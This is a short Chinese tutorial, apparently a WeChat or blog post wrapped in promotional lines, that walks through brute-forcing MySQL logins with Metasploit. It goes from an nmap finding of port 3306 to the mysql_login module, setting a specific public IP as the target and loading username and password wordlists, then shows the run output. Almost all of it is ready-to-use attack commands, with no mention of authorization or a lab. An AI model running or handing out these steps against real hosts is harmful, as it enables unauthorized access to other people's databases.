1. nmap扫出3306端口的话,就往下;

  2. 搜索漏洞

    SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。
msf > search  mysql_login
  1. 使用该漏洞
msf > use auxiliary/scanner/mysql/mysql_login
  1. 查看该漏洞用法
msf auxiliary(mysql_login) > show options
  1. 向rhosts输入ip,看到可以正常访问mysql
msf auxiliary(mysql_login) > set rhosts 121.42.27.192
  1. 找一个测试爆破的用户名字典和密码字典进行爆破
msf auxiliary(mysql_login) > set user_file  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  

msf auxiliary(mysql_login) > set pass_file   /usr/share/sparta/wordlists/mysql-default-userpass.txt  
  1. run
msf auxiliary(mysql_login) > run

# 运行可以查看到mysql版本为5.6.29
[*] 121.42.27.192:3306 MYSQL - Found remote MySQL version 5.6.29
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 看到绿色加号即为破解成功!
扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄